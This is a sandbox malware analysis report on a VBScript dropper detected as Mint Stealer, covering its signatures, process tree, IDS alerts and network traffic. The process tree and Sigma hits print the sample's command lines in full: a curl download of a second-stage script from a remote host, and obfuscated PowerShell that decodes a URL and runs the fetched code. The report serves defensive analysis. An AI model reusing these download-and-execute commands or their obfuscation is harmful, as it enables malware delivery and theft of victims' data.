Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
67618a47ee8c5.vbs

Overview

General Information

Sample name:67618a47ee8c5.vbs
Analysis ID:1576836
MD5:0518287873d4fb8925ae78fdcca2fcf4
SHA1:e9c1ef40ffb8b5cdbc2320ea1f8a5ea53fb5ebcc
SHA256:c7631ac3239d922066eb0d0a1da8f68c440c4af3d189558c890408a03f0e1a69
Tags:vbsuser-cdcd
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 6540 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1804 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 2852 cmdline: curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 6456 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 5708 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 2988 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • conhost.exe (PID: 4852 cmdline: conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7016 cmdline: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6536 cmdline: conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2144 cmdline: powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 368 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7088 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 5916 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
    00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
      0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
        0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
          00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 2988, StartAddress: 5326BCC0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 2988
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5708, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49711
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6456, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , ProcessId: 5708, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js, CommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7088, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js, ProcessId: 5916, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", ProcessId: 6540, ProcessName: wscript.exe
            Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5708, TargetFilename: C:\Users\user\AppData\Local\Temp\bmkvfo.js
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5708, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49711
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6540, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs, ProcessId: 1804, ProcessName: cmd.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", ProcessId: 6540, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), CommandLine: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 4852, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), ProcessId: 7016, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T16:32:15.764124+010020570631A Network Trojan was detected192.168.2.649733193.149.129.6180TCP
            2024-12-17T16:32:15.873503+010020570631A Network Trojan was detected192.168.2.649732193.149.129.6180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T16:32:15.764124+010020577431A Network Trojan was detected192.168.2.649733193.149.129.6180TCP
            2024-12-17T16:32:15.873503+010020577431A Network Trojan was detected192.168.2.649732193.149.129.6180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.9% probability
            Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbe0899 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Core.pdb` source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBBFA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3DD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B5E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdban source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: *e.pdb source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Core.pdbgRc2 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatYs source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2435362967.0000024EBC210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2352549438.000001CA6B5D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb[dhc source: powershell.exe, 00000011.00000002.2351594130.000001CA6B3B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbL source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC27C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbEvX1 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\curl.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.6:49732 -> 193.149.129.61:80
            Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49732 -> 193.149.129.61:80
            Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.6:49733 -> 193.149.129.61:80
            Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49733 -> 193.149.129.61:80
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.11.180.77 443
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: DANISCODK DANISCODK
            Source: Joe Sandbox ViewASN Name: M247GB M247GB
            Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /js/iethuj.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /js/bmkvfo.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /67618a47ee67a/67618a47ee8cd.vbs HTTP/1.1Host: pko-download.kagyouth.co.keUser-Agent: curl/7.83.1Accept: */*
            Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /js/iethuj.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
